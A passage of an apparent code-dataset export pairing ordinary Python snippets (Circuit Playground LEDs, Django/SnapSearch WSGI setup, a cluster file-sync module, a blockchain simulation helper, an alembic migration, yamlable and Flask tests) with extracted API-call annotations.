{'required': '(True)', 'type': 'float', 'help': '\"\"\"lat2\"\"\"'}), \"('--lat2', required=True, type=float, help='lat2')\\n\", (2857, 2907), False, 'import click\\n'), ((2909, 2971), 'click.option', 'click.option', (['\"\"\"--dep1\"\"\"'], {'required': '(True)', 'type': 'float', 'help': '\"\"\"dep1\"\"\"'}), \"('--dep1', required=True, type=float, help='dep1')\\n\", (2921, 2971), False, 'import click\\n'), ((2973, 3035), 'click.option', 'click.option', (['\"\"\"--dep2\"\"\"'], {'required': '(True)', 'type': 'float', 'help': '\"\"\"dep2\"\"\"'}), \"('--dep2', required=True, type=float, help='dep2')\\n\", (2985, 3035), False, 'import click\\n'), ((3037, 3108), 'click.option', 'click.option', (['\"\"\"--data\"\"\"'], {'required': '(True)', 'type': 'str', 'help': '\"\"\"the pickle file\"\"\"'}), \"('--data', required=True, type=str, help='the pickle file')\\n\", (3049, 3108), False, 'import click\\n'), ((3110, 3203), 'click.option', 'click.option', (['\"\"\"--parameter\"\"\"'], {'required': '(True)', 'type': 'str', 'help': '\"\"\"physicial parameter to plot\"\"\"'}), \"('--parameter', required=True, type=str, help=\\n 'physicial parameter to plot')\\n\", (3122, 3203), False, 'import click\\n'), ((3200, 3272), 'click.option', 'click.option', (['\"\"\"--hnpts\"\"\"'], {'required': '(True)', 'type': 'int', 'help': '\"\"\"horizontal npts\"\"\"'}), \"('--hnpts', required=True, type=int, help='horizontal npts')\\n\", (3212, 3272), False, 'import click\\n'), ((3274, 3344), 'click.option', 'click.option', (['\"\"\"--vnpts\"\"\"'], {'required': '(True)', 'type': 'int', 'help': '\"\"\"vertical npts\"\"\"'}), \"('--vnpts', required=True, type=int, help='vertical npts')\\n\", (3286, 3344), False, 'import click\\n'), ((369, 425), 'numpy.meshgrid', 'np.meshgrid', (['lon_list', 'lat_list', 'dep_list'], {'indexing': '\"\"\"ij\"\"\"'}), \"(lon_list, lat_list, dep_list, indexing='ij')\\n\", (380, 425), True, 'import numpy as np\\n'), ((452, 470), 'numpy.shape', 'np.shape', (['lon_mesh'], {}), '(lon_mesh)\\n', (460, 470), True, 'import numpy as np\\n'), ((488, 511), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\\n', (501, 511), True, 'import numpy as np\\n'), ((525, 548), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\\n', (538, 548), True, 'import numpy as np\\n'), ((562, 585), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\\n', (575, 585), True, 'import numpy as np\\n'), ((599, 622), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\\n', (612, 622), True, 'import numpy as np\\n'), ((636, 659), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\\n', (649, 659), True, 'import numpy as np\\n'), ((2209, 2226), 'numpy.min', 'np.min', (['distance2'], {}), '(distance2)\\n', (2215, 2226), True, 'import numpy as np\\n'), ((2239, 2274), 'numpy.where', 'np.where', (['(distance2 == mindistance2)'], {}), '(distance2 == mindistance2)\\n', (2247, 2274), True, 'import numpy as np\\n'), ((2448, 2492), 'numpy.linspace', 'np.linspace', (['lon_list[0]', 'lon_list[1]', 'hnpts'], {}), '(lon_list[0], lon_list[1], hnpts)\\n', (2459, 2492), True, 'import numpy as np\\n'), ((2504, 2548), 'numpy.linspace', 'np.linspace', (['lat_list[0]', 'lat_list[1]', 'hnpts'], {}), '(lat_list[0], lat_list[1], hnpts)\\n', (2515, 2548), True, 'import numpy as np\\n'), ((2560, 2604), 'numpy.linspace', 'np.linspace', (['dep_list[0]', 'dep_list[1]', 'vnpts'], {}), '(dep_list[0], dep_list[1], vnpts)\\n', (2571, 2604), True, 'import numpy as np\\n'), ((3524, 3544), 'pandas.read_pickle', 'pd.read_pickle', (['data'], {}), '(data)\\n', (3538, 3544), True, 'import pandas as pd\\n'), ((4172, 4196), 'numpy.zeros', 'np.zeros', (['(hnpts, vnpts)'], {}), '((hnpts, vnpts))\\n', (4180, 4196), True, 'import numpy as np\\n'), ((4503, 4515), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\\n', (4513, 4515), True, 'import matplotlib.pyplot as plt\\n'), ((4551, 4599), 'numpy.meshgrid', 'np.meshgrid', (['lats_plot', 'deps_plot'], {'indexing': '\"\"\"ij\"\"\"'}), \"(lats_plot, deps_plot, indexing='ij')\\n\", (4562, 4599), True, 'import numpy as np\\n'), ((5009, 5087), 'matplotlib.pyplot.contourf', 'plt.contourf', (['mesh_plot_lat', 'mesh_plot_dep', 'values', '(101)'], {'cmap': 'plt.cm.seismic_r'}), '(mesh_plot_lat, mesh_plot_dep, values, 101, cmap=plt.cm.seismic_r)\\n', (5021, 5087), True, 'import matplotlib.pyplot as plt\\n'), ((5114, 5141), 'numpy.arange', 'np.arange', (['vmin', 'vmax', '(0.01)'], {}), '(vmin, vmax, 0.01)\\n', (5123, 5141), True, 'import numpy as np\\n'), ((5146, 5189), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {'ticks': 'v', 'label': '\"\"\"perturbation\"\"\"'}), \"(ticks=v, label='perturbation')\\n\", (5158, 5189), True, 'import matplotlib.pyplot as plt\\n'), ((5223, 5329), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['f\"\"\"latitude(°) between (lon: {lon1}°, lat: {lat1}°) and (lon: {lon2}°, lat: {lat2}°)\"\"\"'], {}), \"(\\n f'latitude(°) between (lon: {lon1}°, lat: {lat1}°) and (lon: {lon2}°, lat: {lat2}°)'\\n )\\n\", (5233, 5329), True, 'import matplotlib.pyplot as plt\\n'), ((5333, 5356), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['\"\"\"depth(km)\"\"\"'], {}), \"('depth(km)')\\n\", (5343, 5356), True, 'import matplotlib.pyplot as plt\\n'), ((5361, 5371), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\\n', (5369, 5371), True, 'import matplotlib.pyplot as plt\\n'), ((1735, 1748), 'numpy.deg2rad', 'np.deg2rad', (['x'], {}), '(x)\\n', (1745, 1748), True, 'import numpy as np\\n'), ((1797, 1810), 'numpy.deg2rad', 'np.deg2rad', (['x'], {}), '(x)\\n', (1807, 1810), True, 'import numpy as np\\n'), ((4658, 4672), 'numpy.min', 'np.min', (['values'], {}), '(values)\\n', (4664, 4672), True, 'import numpy as np\\n'), ((4697, 4711), 'numpy.min', 'np.min', (['values'], {}), '(values)\\n', (4703, 4711), True, 'import numpy as np\\n'), ((4804, 4818), 'numpy.max', 'np.max', (['values'], {}), '(values)\\n', (4810, 4818), True, 'import numpy as np\\n'), ((4843, 4857), 'numpy.max', 'np.max', (['values'], {}), '(values)\\n', (4849, 4857), True, 'import numpy as np\\n'), ((4949, 4963), 'numpy.max', 'np.max', (['values'], {}), '(values)\\n', (4955, 4963), True, 'import numpy as np\\n'), ((4965, 4979), 'numpy.min', 'np.min', (['values'], {}), '(values)\\n', (4971, 4979), True, 'import numpy as np\\n'), ((5194, 5203), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\\n', (5201, 5203), True, 'import matplotlib.pyplot as plt\\n')]"}}},{"rowIdx":799,"cells":{"code":{"kind":"string","value":"from flask import Flask\nfrom flask_appconfig import HerokuConfig\n\n\ndef create_sample_app():\n app = Flask('testapp')\n HerokuConfig(app)\n return app\n\n\ndef test_herokupostgres(monkeypatch):\n monkeypatch.setenv('HEROKU_POSTGRESQL_ORANGE_URL', 'heroku-db-uri')\n\n app = create_sample_app()\n assert app.config['SQLALCHEMY_DATABASE_URI'] == 'heroku-db-uri'\n"},"apis":{"kind":"list like","value":["flask_appconfig.HerokuConfig","flask.Flask"],"string":"[\n \"flask_appconfig.HerokuConfig\",\n \"flask.Flask\"\n]"},"extract_api":{"kind":"string","value":"[((102, 118), 'flask.Flask', 'Flask', (['\"\"\"testapp\"\"\"'], {}), \"('testapp')\\n\", (107, 118), False, 'from flask import Flask\\n'), ((123, 140), 'flask_appconfig.HerokuConfig', 'HerokuConfig', (['app'], {}), '(app)\\n', (135, 140), False, 'from flask_appconfig import HerokuConfig\\n')]"}}}],"truncated":false,"partial":false},"paginationData":{"pageIndex":7,"numItemsPerPage":100,"numTotalItems":4772871,"offset":700,"length":100}},"jwt":"eyJhbGciOiJFZERTQSJ9.eyJyZWFkIjp0cnVlLCJwZXJtaXNzaW9ucyI6eyJyZXBvLmNvbnRlbnQucmVhZCI6dHJ1ZX0sImlhdCI6MTc2NTUwMDI1NCwic3ViIjoiL2RhdGFzZXRzL2x1bmEtY29kZS9zdGFyY29kZXJkYXRhLWFwaXMiLCJleHAiOjE3NjU1MDM4NTQsImlzcyI6Imh0dHBzOi8vaHVnZ2luZ2ZhY2UuY28ifQ.nNBxsHtOA3QpnlFisPVIoG_DkVJRTjJcHypFbBt-JqwHwwE4uy81Hwc4a4bkPMHhQLEzxi7CZUzExpbymhJ6Dg","displayUrls":true,"splitSizeSummaries":[{"config":"default","split":"train","numRows":4772871,"numBytesParquet":13555618994}]},"discussionsStats":{"closed":0,"open":0,"total":0},"fullWidth":true,"hasGatedAccess":true,"hasFullAccess":true,"isEmbedded":false,"savedQueries":{"community":[],"user":[]}}">
code
stringlengths
22
1.05M
apis
listlengths
1
3.31k
extract_api
stringlengths
75
3.25M
from adafruit_circuitplayground.express import cpx # Main loop gets x, y and z axis acceleration, prints the values, and turns on # red, green and blue, at levels related to the x, y and z values. while True: if cpx.switch: print("Slide switch off!") cpx.pixels.fill((0, 0, 0)) continue else: R = 0 G = 0 B = 0 x, y, z = cpx.acceleration print((x, y, z)) if x: R = R + abs(int(x)) if y: G = G + abs(int(y)) if z: B = B + abs(int(z)) cpx.pixels.fill((R, G, B))
[ "adafruit_circuitplayground.express.cpx.pixels.fill" ]
[((272, 298), 'adafruit_circuitplayground.express.cpx.pixels.fill', 'cpx.pixels.fill', (['(0, 0, 0)'], {}), '((0, 0, 0))\n', (287, 298), False, 'from adafruit_circuitplayground.express import cpx\n'), ((574, 600), 'adafruit_circuitplayground.express.cpx.pixels.fill', 'cpx.pixels.fill', (['(R, G, B)'], {}), '((R, G, B))\n', (589, 600), False, 'from adafruit_circuitplayground.express import cpx\n')]
import os os.environ.setdefault("DJANGO_SETTINGS_MODULE", "hello_world.settings") # django WSGI application from django.core.wsgi import get_wsgi_application application = get_wsgi_application() # load SnapSearch API credentials api_email = "<email>" api_key = "<key>" # initialize the interceptor from SnapSearch import Client, Detector, Interceptor interceptor = Interceptor(Client(api_email, api_key), Detector()) # deploy the interceptor from SnapSearch.wsgi import InterceptorMiddleware application = InterceptorMiddleware(application, interceptor)
[ "os.environ.setdefault", "django.core.wsgi.get_wsgi_application", "SnapSearch.wsgi.InterceptorMiddleware", "SnapSearch.Client", "SnapSearch.Detector" ]
[((11, 82), 'os.environ.setdefault', 'os.environ.setdefault', (['"""DJANGO_SETTINGS_MODULE"""', '"""hello_world.settings"""'], {}), "('DJANGO_SETTINGS_MODULE', 'hello_world.settings')\n", (32, 82), False, 'import os\n'), ((174, 196), 'django.core.wsgi.get_wsgi_application', 'get_wsgi_application', ([], {}), '()\n', (194, 196), False, 'from django.core.wsgi import get_wsgi_application\n'), ((511, 558), 'SnapSearch.wsgi.InterceptorMiddleware', 'InterceptorMiddleware', (['application', 'interceptor'], {}), '(application, interceptor)\n', (532, 558), False, 'from SnapSearch.wsgi import InterceptorMiddleware\n'), ((381, 407), 'SnapSearch.Client', 'Client', (['api_email', 'api_key'], {}), '(api_email, api_key)\n', (387, 407), False, 'from SnapSearch import Client, Detector, Interceptor\n'), ((409, 419), 'SnapSearch.Detector', 'Detector', ([], {}), '()\n', (417, 419), False, 'from SnapSearch import Client, Detector, Interceptor\n')]
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2021 Lenovo # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import glob import os import shutil import tempfile import confluent.sshutil as sshutil import confluent.util as util import confluent.noderange as noderange import eventlet import pwd import grp def mkdirp(path): try: os.makedirs(path) except OSError as e: if e.errno != 17: raise def get_entries(filename): secname = 'REPLACE:' filename = filename.strip() if filename[-1] == '>': filename = filename[:-1] with open(filename, 'r') as slfile: slist = slfile.read() entries = slist.split('\n') for ent in entries: ent = ent.split('#', 1)[0].strip() if not ent: continue if ent in ('APPENDONCE:', 'MERGE:', 'REPLACE:'): secname = ent if ent[0] == '<': subfilename = ent[1:] if subfilename[-1] == '>': subfilename = subfilename[:-1] if subfilename[0] != '/': subfilename = os.path.join(os.path.dirname(filename), subfilename) for subent in get_entries(subfilename): yield subent yield secname else: yield ent class SyncList(object): def __init__(self, filename, nodename, cfg): slist = None self.replacemap = {} self.appendmap = {} self.appendoncemap = {} self.mergemap = {} self.optmap = {} entries = get_entries(filename) currmap = self.replacemap for ent in entries: try: cmtidx = ent.index('#') ent = ent[:cmtidx] except ValueError: pass for special in '$%^&|{}': if special in ent: raise Exception( 'Special character "{}" reserved for future use'.format(special)) ent = ent.strip() if not ent: continue if ent[-1] == ':': if ent == 'MERGE:': currmap = self.mergemap elif ent == 'APPENDONCE:': currmap = self.appendoncemap elif ent == 'REPLACE:': currmap = self.replacemap else: raise Exception( 'Section "{}" is not currently supported in syncfiles'.format(ent[:-1])) continue if '->' in ent: k, v = ent.split('->') k = k.strip() v = v.strip() if ':' in v: nr, v = v.split(':', 1) for candidate in noderange.NodeRange(nr, cfg).nodes: if candidate == nodename: break else: continue optparts = v.split() v = optparts[0] optparts = optparts[1:] else: kparts = [] optparts = [] currparts = kparts for part in ent.split(): if part[0] == '(': currparts = optparts currparts.append(part) k = ' '.join(kparts) v = None entopts = {} if optparts: if optparts[0][0] != '(' or optparts[-1][-1] != ')': raise Exception("Unsupported syntax in syncfile: " + ent) opts = ','.join(optparts) opts = opts[1:-1] for opt in opts.split(','): optname, optval = opt.split('=') if optname == 'owner': try: uid = pwd.getpwnam(optval).pw_uid except KeyError: uid = None optval = {'name': optval, 'id': uid} elif optname == 'group': try: gid = grp.getgrnam(optval).gr_gid except KeyError: gid = None optval = {'name': optval, 'id': gid} entopts[optname] = optval currmap[k] = v targ = v if v else k for f in targ.split(): self.optmap[f] = entopts def sync_list_to_node(sl, node, suffixes): targdir = tempfile.mkdtemp('.syncto{}'.format(node)) output = '' try: for ent in sl.replacemap: stage_ent(sl.replacemap, ent, targdir) if 'append' in suffixes: while suffixes['append'] and suffixes['append'][0] == '/': suffixes['append'] = suffixes['append'][1:] for ent in sl.appendmap: stage_ent(sl.appendmap, ent, os.path.join(targdir, suffixes['append'])) if 'merge' in suffixes: while suffixes['merge'] and suffixes['merge'][0] == '/': suffixes['merge'] = suffixes['merge'][1:] for ent in sl.mergemap: stage_ent(sl.mergemap, ent, os.path.join(targdir, suffixes['merge']), True) if 'appendonce' in suffixes: while suffixes['appendonce'] and suffixes['appendonce'][0] == '/': suffixes['appendonce'] = suffixes['appendonce'][1:] for ent in sl.appendoncemap: stage_ent(sl.appendoncemap, ent, os.path.join(targdir, suffixes['appendonce']), True) sshutil.prep_ssh_key('/etc/confluent/ssh/automation') output = util.run( ['rsync', '-rvLD', targdir + '/', 'root@{}:/'.format(node)])[0] except Exception as e: if 'CalledProcessError' not in repr(e): # https://github.com/eventlet/eventlet/issues/413 # for some reason, can't catch the calledprocesserror normally # for this exception, implement a hack workaround raise unreadablefiles = [] for root, dirnames, filenames in os.walk(targdir): for filename in filenames: filename = os.path.join(root, filename) try: with open(filename, 'r') as _: pass except OSError as e: unreadablefiles.append(filename.replace(targdir, '')) if unreadablefiles: raise Exception("Syncing failed due to unreadable files: " + ','.join(unreadablefiles)) else: raise finally: shutil.rmtree(targdir) if not isinstance(output, str): output = output.decode('utf8') retval = { 'options': sl.optmap, 'output': output, } return retval # need dictionary with output and options def stage_ent(currmap, ent, targdir, appendexist=False): dst = currmap[ent] everyfent = [] allfents = ent.split() for tmpent in allfents: fents = glob.glob(tmpent) everyfent.extend(fents) if not everyfent: raise Exception('No matching files for "{}"'.format(ent)) if dst is None: # this is to indicate source and destination as one dst = os.path.dirname(everyfent[0]) + '/' while dst and dst[0] == '/': dst = dst[1:] if len(everyfent) > 1 and dst[-1] != '/': raise Exception( 'Multiple files match {}, {} needs a trailing slash to indicate a directory'.format(ent, dst)) fulltarg = os.path.join(targdir, dst) for targ in everyfent: mkpathorlink(targ, fulltarg, appendexist) def mkpathorlink(source, destination, appendexist=False): if os.path.isdir(source): mkdirp(destination) for ent in os.listdir(source): currsrc = os.path.join(source, ent) currdst = os.path.join(destination, ent) mkpathorlink(currsrc, currdst) else: if destination[-1] == '/': mkdirp(destination) destination = os.path.join(destination, os.path.basename(source)) else: mkdirp(os.path.dirname(destination)) if appendexist and os.path.exists(destination): tmpnam = tempfile.mktemp() shutil.copy(destination, tmpnam) os.remove(destination) with open(destination, 'w') as realdest: with open(tmpnam) as olddest: realdest.write(olddest.read()) with open(source) as sourcedata: realdest.write(sourcedata.read()) os.remove(tmpnam) else: os.symlink(source, destination) syncrunners = {} def start_syncfiles(nodename, cfg, suffixes): deployinfo = cfg.get_node_attributes( nodename, ('deployment.*',)) deployinfo = deployinfo.get(nodename, {}) profile = deployinfo.get( 'deployment.pendingprofile', {}).get('value', '') if not profile: profile = deployinfo.get( 'deployment.stagedprofile', {}).get('value', '') if not profile: profile = deployinfo.get( 'deployment.profile', {}).get('value', '') if not profile: raise Exception('Cannot perform syncfiles without profile assigned') synclist = '/var/lib/confluent/public/os/{}/syncfiles'.format(profile) if not os.path.exists(synclist): return '200 OK' # not running sl = SyncList(synclist, nodename, cfg) if not (sl.appendmap or sl.mergemap or sl.replacemap or sl.appendoncemap): return '200 OK' # the synclist has no actual entries syncrunners[nodename] = eventlet.spawn( sync_list_to_node, sl, nodename, suffixes) return '202 Queued' # backgrounded def get_syncresult(nodename): if nodename not in syncrunners: return ('204 Not Running', '') if not syncrunners[nodename].dead: return ('200 OK', '') result = syncrunners[nodename].wait() del syncrunners[nodename] return ('200 OK', result)
[ "os.walk", "os.remove", "os.path.exists", "os.listdir", "pwd.getpwnam", "os.path.isdir", "glob.glob", "confluent.sshutil.prep_ssh_key", "os.path.dirname", "shutil.copy", "confluent.noderange.NodeRange", "grp.getgrnam", "os.makedirs", "eventlet.spawn", "os.path.join", "os.symlink", "tempfile.mktemp", "os.path.basename", "shutil.rmtree" ]
[((8126, 8152), 'os.path.join', 'os.path.join', (['targdir', 'dst'], {}), '(targdir, dst)\n', (8138, 8152), False, 'import os\n'), ((8296, 8317), 'os.path.isdir', 'os.path.isdir', (['source'], {}), '(source)\n', (8309, 8317), False, 'import os\n'), ((10220, 10277), 'eventlet.spawn', 'eventlet.spawn', (['sync_list_to_node', 'sl', 'nodename', 'suffixes'], {}), '(sync_list_to_node, sl, nodename, suffixes)\n', (10234, 10277), False, 'import eventlet\n'), ((848, 865), 'os.makedirs', 'os.makedirs', (['path'], {}), '(path)\n', (859, 865), False, 'import os\n'), ((6186, 6239), 'confluent.sshutil.prep_ssh_key', 'sshutil.prep_ssh_key', (['"""/etc/confluent/ssh/automation"""'], {}), "('/etc/confluent/ssh/automation')\n", (6206, 6239), True, 'import confluent.sshutil as sshutil\n'), ((7211, 7233), 'shutil.rmtree', 'shutil.rmtree', (['targdir'], {}), '(targdir)\n', (7224, 7233), False, 'import shutil\n'), ((7617, 7634), 'glob.glob', 'glob.glob', (['tmpent'], {}), '(tmpent)\n', (7626, 7634), False, 'import glob\n'), ((8366, 8384), 'os.listdir', 'os.listdir', (['source'], {}), '(source)\n', (8376, 8384), False, 'import os\n'), ((9943, 9967), 'os.path.exists', 'os.path.exists', (['synclist'], {}), '(synclist)\n', (9957, 9967), False, 'import os\n'), ((6705, 6721), 'os.walk', 'os.walk', (['targdir'], {}), '(targdir)\n', (6712, 6721), False, 'import os\n'), ((7842, 7871), 'os.path.dirname', 'os.path.dirname', (['everyfent[0]'], {}), '(everyfent[0])\n', (7857, 7871), False, 'import os\n'), ((8408, 8433), 'os.path.join', 'os.path.join', (['source', 'ent'], {}), '(source, ent)\n', (8420, 8433), False, 'import os\n'), ((8456, 8486), 'os.path.join', 'os.path.join', (['destination', 'ent'], {}), '(destination, ent)\n', (8468, 8486), False, 'import os\n'), ((8775, 8802), 'os.path.exists', 'os.path.exists', (['destination'], {}), '(destination)\n', (8789, 8802), False, 'import os\n'), ((8825, 8842), 'tempfile.mktemp', 'tempfile.mktemp', ([], {}), '()\n', (8840, 8842), False, 'import tempfile\n'), ((8855, 8887), 'shutil.copy', 'shutil.copy', (['destination', 'tmpnam'], {}), '(destination, tmpnam)\n', (8866, 8887), False, 'import shutil\n'), ((8900, 8922), 'os.remove', 'os.remove', (['destination'], {}), '(destination)\n', (8909, 8922), False, 'import os\n'), ((9188, 9205), 'os.remove', 'os.remove', (['tmpnam'], {}), '(tmpnam)\n', (9197, 9205), False, 'import os\n'), ((9232, 9263), 'os.symlink', 'os.symlink', (['source', 'destination'], {}), '(source, destination)\n', (9242, 9263), False, 'import os\n'), ((8659, 8683), 'os.path.basename', 'os.path.basename', (['source'], {}), '(source)\n', (8675, 8683), False, 'import os\n'), ((8718, 8746), 'os.path.dirname', 'os.path.dirname', (['destination'], {}), '(destination)\n', (8733, 8746), False, 'import os\n'), ((1601, 1626), 'os.path.dirname', 'os.path.dirname', (['filename'], {}), '(filename)\n', (1616, 1626), False, 'import os\n'), ((5469, 5510), 'os.path.join', 'os.path.join', (['targdir', "suffixes['append']"], {}), "(targdir, suffixes['append'])\n", (5481, 5510), False, 'import os\n'), ((5777, 5817), 'os.path.join', 'os.path.join', (['targdir', "suffixes['merge']"], {}), "(targdir, suffixes['merge'])\n", (5789, 5817), False, 'import os\n'), ((6125, 6170), 'os.path.join', 'os.path.join', (['targdir', "suffixes['appendonce']"], {}), "(targdir, suffixes['appendonce'])\n", (6137, 6170), False, 'import os\n'), ((6789, 6817), 'os.path.join', 'os.path.join', (['root', 'filename'], {}), '(root, filename)\n', (6801, 6817), False, 'import os\n'), ((3252, 3280), 'confluent.noderange.NodeRange', 'noderange.NodeRange', (['nr', 'cfg'], {}), '(nr, cfg)\n', (3271, 3280), True, 'import confluent.noderange as noderange\n'), ((4357, 4377), 'pwd.getpwnam', 'pwd.getpwnam', (['optval'], {}), '(optval)\n', (4369, 4377), False, 'import pwd\n'), ((4634, 4654), 'grp.getgrnam', 'grp.getgrnam', (['optval'], {}), '(optval)\n', (4646, 4654), False, 'import grp\n')]
import json import os from argparse import ArgumentTypeError from eth_typing import Address from web3.contract import Contract from settings import MIN_VAL, MAX_VAL, DEPLOYED_CONTRACTS, CONFIG_DIR async def init_simulation(contracts: [], factor: float, fn: str, status_init: bool) -> bool: statuses = [True] try: if status_init: for c in contracts: # Use different cloud_addresses for each contract instance cloud_address, cloud_status_ok = await c.cloud_sla_creation_activation() c.set_cloud_sla_address(cloud_address) statuses.append(cloud_status_ok) if fn == 'read' or fn == 'read_deny_lost_file_check' or fn == 'file_check_undeleted_file': statuses.append(await c.upload()) if fn == 'file_check_undeleted_file': statuses.append(await c.read()) if fn == 'corrupted_file_check': statuses.append(await c.another_file_upload_read()) if fn == 'delete': for _ in range(round(factor / DEPLOYED_CONTRACTS) + 1): statuses.append(await c.upload()) else: for c in contracts: if fn == 'delete': if c.tx_upload_count < round(factor / DEPLOYED_CONTRACTS) + 1: for _ in range(abs(c.tx_upload_count - (round(factor / DEPLOYED_CONTRACTS) + 1))): statuses.append(await c.upload()) except ValueError as v: print(f'{type(v)} [init_sim]: {v}') else: return check_statuses(statuses) def get_credentials(blockchain: str) -> tuple: if blockchain == 'polygon': from settings import ( polygon_private_keys ) return polygon_private_keys from settings import ( quorum_private_keys ) return quorum_private_keys def get_contract(w3, address: Address, compiled_contract_path: str) -> Contract: def get_abi(path: str) -> list: with open(path) as file: contract_json = json.load(file) contract_abi = contract_json['abi'] return contract_abi abi = get_abi(compiled_contract_path) contract = w3.eth.contract(address=address, abi=abi) return contract def check_statuses(statuses: []) -> bool: for idx in range(len(statuses)): if statuses[idx] == 0: return False return True def exists_mkdir(paths: []): for path in paths: if not os.path.exists(path): os.mkdir(path) def get_contracts_config(blockchain: str, msg: bool = True): if msg: print('Retrieve config file...') filename = f'{blockchain}.json' filepath = os.path.join(os.getcwd(), CONFIG_DIR, filename) with open(filepath) as file: contracts_summary = json.loads(file.read()) if msg: print(f'Config file retrieved at {filepath}.') return contracts_summary def range_limited_val(arg: str) -> int: """ Type function for argparse - int within some predefined bounds. """ try: s = int(arg) except ValueError: raise ArgumentTypeError("must be a int number") if s < MIN_VAL or s > MAX_VAL: raise ArgumentTypeError(f"argument must be > {str(MIN_VAL)} and < {str(MAX_VAL)}") return s
[ "os.path.exists", "argparse.ArgumentTypeError", "os.getcwd", "os.mkdir", "json.load" ]
[((2789, 2800), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2798, 2800), False, 'import os\n'), ((2125, 2140), 'json.load', 'json.load', (['file'], {}), '(file)\n', (2134, 2140), False, 'import json\n'), ((2560, 2580), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (2574, 2580), False, 'import os\n'), ((2594, 2608), 'os.mkdir', 'os.mkdir', (['path'], {}), '(path)\n', (2602, 2608), False, 'import os\n'), ((3198, 3239), 'argparse.ArgumentTypeError', 'ArgumentTypeError', (['"""must be a int number"""'], {}), "('must be a int number')\n", (3215, 3239), False, 'from argparse import ArgumentTypeError\n')]
"""add topics Revision ID: 816ea3631582 Revises: <KEY> Create Date: 2021-03-13 14:20:10.044131 """ from alembic import op import sqlalchemy as sa import bot # revision identifiers, used by Alembic. revision = "816ea3631582" down_revision = "<KEY>" branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.create_table( "topics", sa.Column("content", sa.Text(), nullable=False), sa.Column("last_synced_at", bot.database.TIMESTAMP(timezone=True), nullable=True), sa.PrimaryKeyConstraint("content"), ) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_table("topics") # ### end Alembic commands ###
[ "alembic.op.drop_table", "sqlalchemy.PrimaryKeyConstraint", "bot.database.TIMESTAMP", "sqlalchemy.Text" ]
[((735, 758), 'alembic.op.drop_table', 'op.drop_table', (['"""topics"""'], {}), "('topics')\n", (748, 758), False, 'from alembic import op\n'), ((569, 603), 'sqlalchemy.PrimaryKeyConstraint', 'sa.PrimaryKeyConstraint', (['"""content"""'], {}), "('content')\n", (592, 603), True, 'import sqlalchemy as sa\n'), ((442, 451), 'sqlalchemy.Text', 'sa.Text', ([], {}), '()\n', (449, 451), True, 'import sqlalchemy as sa\n'), ((506, 543), 'bot.database.TIMESTAMP', 'bot.database.TIMESTAMP', ([], {'timezone': '(True)'}), '(timezone=True)\n', (528, 543), False, 'import bot\n')]
from copy import copy try: # Python 2 only: from StringIO import StringIO # create a variant that can serve as a context manager class StringIO(StringIO): def __enter__(self): return self def __exit__(self, exception_type, exception_value, traceback): self.close() except ImportError: from io import StringIO try: # python 3.5+ from typing import Dict, Any from yamlable import Y except ImportError: pass import pytest from yaml import dump, load from yamlable import YamlAble, yaml_info def test_yamlable_incomplete_description(): """ Tests that if __yaml_tag_suffix__ is not provided a YamlAble subclass cannot be declared """ with pytest.raises(NotImplementedError) as err_info: class Foo(YamlAble): # __yaml_tag_suffix__ = 'foo' def __to_yaml_dict__(self): # type: (...) -> Dict[str, Any] return copy(vars(self)) @classmethod def __from_yaml_dict__(cls, # type: Type[Y] dct, # type: Dict[str, Any] yaml_tag # type: str ): # type: (...) -> Y return Foo(**dct) # instantiate f = Foo() # dump f.dumps_yaml() assert "does not seem to have a non-None '__yaml_tag_suffix__' field" in str(err_info.value) def test_yamlable(): """ Tests that YamlAble works correctly """ @yaml_info(yaml_tag_ns='yaml.tests') class Foo(YamlAble): # __yaml_tag_suffix__ = 'foo' not needed: we used @yaml_info def __init__(self, a, b): self.a = a self.b = b def __eq__(self, other): return vars(self) == vars(other) def __to_yaml_dict__(self): # type: (...) -> Dict[str, Any] return copy(vars(self)) @classmethod def __from_yaml_dict__(cls, # type: Type[Y] dct, # type: Dict[str, Any] yaml_tag # type: str ): # type: (...) -> Y return Foo(**dct) # instantiate f = Foo(1, 'hello') # note: # dump y = f.dumps_yaml(default_flow_style=False) assert y == """!yamlable/yaml.tests.Foo a: 1 b: hello """ # dump io class MemorizingStringIO(StringIO): """ A StringIO object that memorizes its buffer when it is closed (as opposed to the standard StringIO) """ def close(self): self.value = self.getvalue() # super(StringIO, self).close() # this does not work with python 2 old-style classes (StringIO is one) StringIO.close(self) s = MemorizingStringIO() f.dump_yaml(s, default_flow_style=False) assert s.value == y # dump pyyaml assert dump(f, default_flow_style=False) == y # load assert f == Foo.loads_yaml(y) # load io assert f == Foo.load_yaml(StringIO(y)) # load pyyaml assert f == load(y) def test_yamlable_legacy_method_names(): """ Tests that YamlAbleMixIn works correctly """ global enc global dec enc, dec = False, False @yaml_info(yaml_tag_ns='yaml.tests') class FooLegacy(YamlAble): # __yaml_tag_suffix__ = 'foo' not needed: we used @yaml_info def __init__(self, a, b): self.a = a self.b = b def __eq__(self, other): return vars(self) == vars(other) def to_yaml_dict(self): # type: (...) -> Dict[str, Any] global enc enc = True return copy(vars(self)) @classmethod def from_yaml_dict(cls, # type: Type[Y] dct, # type: Dict[str, Any] yaml_tag # type: str ): # type: (...) -> Y global dec dec = True return 